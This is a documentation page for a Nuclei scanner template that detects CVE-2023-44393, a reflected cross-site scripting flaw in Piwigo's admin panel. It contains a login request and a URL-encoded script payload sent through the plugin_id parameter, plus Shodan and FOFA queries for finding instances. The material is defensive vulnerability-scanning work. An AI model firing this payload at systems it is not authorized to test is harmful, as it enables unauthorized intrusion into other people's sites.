Piwigo - Cross-Site Scripting
ID: CVE-2023-44393
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,piwigo,xss,authenticated
Description
Section titled “Description”Piwigo is vulnerable to a reflected XSS in the admin panel where the plugin_id parameter is not properly sanitized.
YAML Source
Section titled “YAML Source”id: CVE-2023-44393
info: name: Piwigo - Cross-Site Scripting author: ritikchaddha severity: medium description: | Piwigo is vulnerable to a reflected XSS in the admin panel where the `plugin_id` parameter is not properly sanitized. impact: | Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. remediation: | Update Piwigo to the latest version to mitigate the reflected XSS vulnerability. reference: - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-qg85-957m-7vgg - https://nvd.nist.gov/vuln/detail/CVE-2023-44393 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44393 cwe-id: CWE-79 epss-score: 0.00046 epss-percentile: 0.15636 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 fofa-query: title="piwigo" tags: cve,cve2023,piwigo,xss,authenticated
http: - raw: - | POST /identification.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&login=
- | GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_2 words: - "<script>prompt(document.domain)</script>" - "The plugin has been successfully copied" condition: and
- type: word part: header_2 words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022000f9e2702fa447f050dc77f3079f5f60493a8a57ea7e4a9b38257e9530fadabd022100dc4db3c990d81057d8293f91d7bc7a3d46164710ae73d9fa7088a26125ab988e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-44393.yaml"